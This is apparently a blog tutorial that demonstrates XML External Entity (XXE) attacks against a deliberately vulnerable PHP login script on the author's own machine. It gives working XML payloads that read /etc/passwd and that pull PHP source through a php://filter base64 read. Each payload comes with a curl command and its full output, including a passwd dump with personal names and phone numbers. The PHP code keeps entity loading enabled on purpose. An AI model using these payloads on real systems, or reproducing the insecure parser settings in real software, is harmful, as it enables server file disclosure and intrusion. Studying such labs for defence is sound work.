Today we will be exploring XXE XML External Entity Attacks. A XXE attack is a attack that is brought against an application that deals with XML as its input.
This is our vulnerable php code:
xml.php
<?php
libxml_disable_entity_loader (false);
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$user = $creds->user;
$pass = $creds->pass;
echo "You have logged in as user $user";
?>
Our goal here is to include a malicious xml file with the data definitions set so that we can read local files on the server. This is our XML file we will POST to the application. If everything goes well the document will return the contents of /etc/passwd.
users.xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
We can post this file to the application using the cURL utility.
root@asus:~/public_html% curl -d @users.xml http://localhost/~sam/xml.php You have logged in as user root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false messagebus:x:104:108::/var/run/dbus:/bin/false syslog:x:105:109::/home/syslog:/bin/false _apt:x:106:65534::/nonexistent:/bin/false ntp:x:107:113::/home/ntp:/bin/false avahi-autoipd:x:108:114:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:109:115:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false colord:x:110:118:colord colour management daemon,,,:/var/lib/colord:/bin/false dnsmasq:x:111:65534:dnsmasq,,,:/var/lib/misc:/bin/false pulse:x:112:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false rtkit:x:114:121:RealtimeKit,,,:/proc:/bin/false saned:x:115:122::/var/lib/saned:/bin/false usbmux:x:116:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false speech-dispatcher:x:117:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false uuidd:x:118:123::/run/uuidd:/bin/false sam:x:1000:1000:sam,,,:/home/sam:/bin/bash statd:x:119:65534::/var/lib/nfs:/bin/false mysql:x:120:127:MySQL Server,,,:/nonexistent:/bin/false openldap:x:121:128:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false test:x:1001:1001:test test,333,555-444-3212,:/home/test:/bin/bash snmp:x:122:129::/var/lib/snmp:/usr/sbin/nologin clare:x:1002:1002:clare chapman,100,555-222-1234,:/home/clare:/bin/bash vance:x:1003:1003:vance perkins,101,,:/home/vance:/bin/bash sasha:x:1004:1004:sasha kim,102,,:/home/sasha:/bin/bash hayden:x:1005:1005:hayden sutton,103,,:/home/hayden:/bin/bash jared:x:1006:1006:jared beck,104,,:/home/jared:/bin/bash dovecot:x:124:132:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false dovenull:x:125:133:Dovecot login user,,,:/nonexistent:/bin/false bind:x:126:134::/var/cache/bind:/bin/false ftp:x:127:135:ftp daemon,,,:/srv/ftp:/bin/false sshd:x:128:65534::/var/run/sshd:/usr/sbin/nologin user434:x:1007:1007:,,,:/home/user434:/bin/bash postfix:x:123:130::/var/spool/postfix:/bin/false muser342:x:1008:1008:,,,:/home/muser342:/bin/bash muser455:x:1009:1009:,,,:/home/muser455:/bin/bash muser123:x:1010:1010:,,,:/home/muser123:/bin/bash muser324:x:1011:1011:,,,:/home/muser324:/bin/bash muser223:x:1012:1012:,,,:/home/muser223:/bin/bash root@asus:~/public_html%
As you can see we successfully included the tainted XML file and POST'd it to the server which gave us the contents of the /etc/passwd file.
Using PHP Filters with XXE
You can also use PHP Filters to include local and remote files on the server through the base64 filter. This way we can read the source code of the files on the webserver.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=info.php" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
If we load up our request in cURL and submit the POST we should get the source of the info.php file base64 encoded.
root@asus:~/public_html% curl -d @users.xml http://localhost/~sam/xml.php You have logged in as user PD9waHAgcGhwaW5mbygpOz8+Cg== root@asus:~/public_html%
if we decode the string from our request we get.
root@asus:~/public_html% echo PD9waHAgcGhwaW5mbygpOz8+Cg== | base64 -d <?php phpinfo();?> root@asus:~/public_html%
No comments:
Post a Comment